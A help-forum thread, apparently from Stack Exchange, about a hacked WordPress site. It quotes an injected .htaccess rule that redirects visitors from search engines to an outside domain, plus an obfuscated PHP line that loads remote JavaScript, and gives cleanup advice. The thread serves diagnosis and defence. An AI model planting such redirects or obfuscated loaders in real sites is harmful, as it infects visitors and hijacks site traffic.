How to prevent my website from getting malware injection attacks?

  • My website was banned as a malware website by Google. When I checked the code, I found out that some code injected many files on my server. I cleaned everything manually, edited all files on my server (shared hosting) by searching some code from the injected code in all the files. Even the .htaccess file was modified by the attacker.

    There were two WordPress installations on the website, in two different subfolders of the website root, which were not updated. I updated both.

    Then Google removed ban on my website.

    Yesterday, I found out that the .htaccess file on my website was again modified by the attacker. Here is the code:

    #b58b6f#
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
    RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
    </IfModule>
    #/b58b6f#
    

    I searched for "b58b6f" in all the files, but I don't find any. I think this is the only file modified by the most recent attack. I deleted this .htaccess file, as I don't need it.

    How was the hacker able to hack my website? How to prevent this to happen again? How I can make my website more secure?

    Do you have your website in subversion (or similar)? An hourly `svn status` cron job can alert you very quickly to *any* changes and a manual `svn revert` can remove all the changes.

    "malware injection" is just a symptom of insecure code. An attacker needs a vulnerability such as SQL Injection or a Local File Include vulnerability in order to make this happen.

  • Cyril N.

    Cyril N. Correct answer

    9 years ago

    It seems that the malware you encountered is the "daysofyorr.com virus" or MW:HTA:7.

    I'm suggesting that you to use FileZilla as the FTP client. If so, you must know that FileZilla store the credentials of your websites in plain text. A virus may have accessed your credentials, and then accessed all your registered websites searching for WordPress install in order to update the files by inserting this code.

    Now, you should:

    • Search your computer for any viruses, malware, etc.
    • Change the FTP password of all your registered FTP accounts saved in FileZilla
    • Eventually use a better FTP system, like WinSCP

    A late comment, but I suspect that you use FileZilla as your FTP client. Did you know that FileZilla stores your FTP site credentials (site/user/pass) in a plain text file in the %APPDATA% folder?

    And I also suspect there is a hidden malware on your computer. It grabbed your FileZilla credential files, and used them to change your header.php file in your theme folder. In fact, I suspect that you will find changed header.php in all of your themes folders.

    And if you are technical enough to look at your FTP log files, you will find the access to those files: a download, then an upload of the changed files. You might also find some random file names that were uploaded to your root ('home') folder, although those files were deleted by the hacker.

    And, you will find that the IP address in the FTP log of the hacker was from China.

    Recommendation: uninstall FileZilla, delete the FileZilla folder from %APPDATA% folder, change your FTP passwords (and your host passwords). And look for any changed header.php, footer.php, and wp-settings.php files.

    For the "daysofyorr.com virus", you can confirm this by checking some of your PHP files (like index.php), if you find this code:

    #b58b6f#
    echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
    #/b58b6f#
    

    That's it!

    For information, it translate into:

    <script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>
    

    Which seems to lead to a 404 nowadays.

    Did you confirmed it was one of those viruses? I would be curious to know which one :p (I would believe more about MW:HTA:7)

License under CC-BY-SA with attribution


Content dated before 7/24/2021 11:53 AM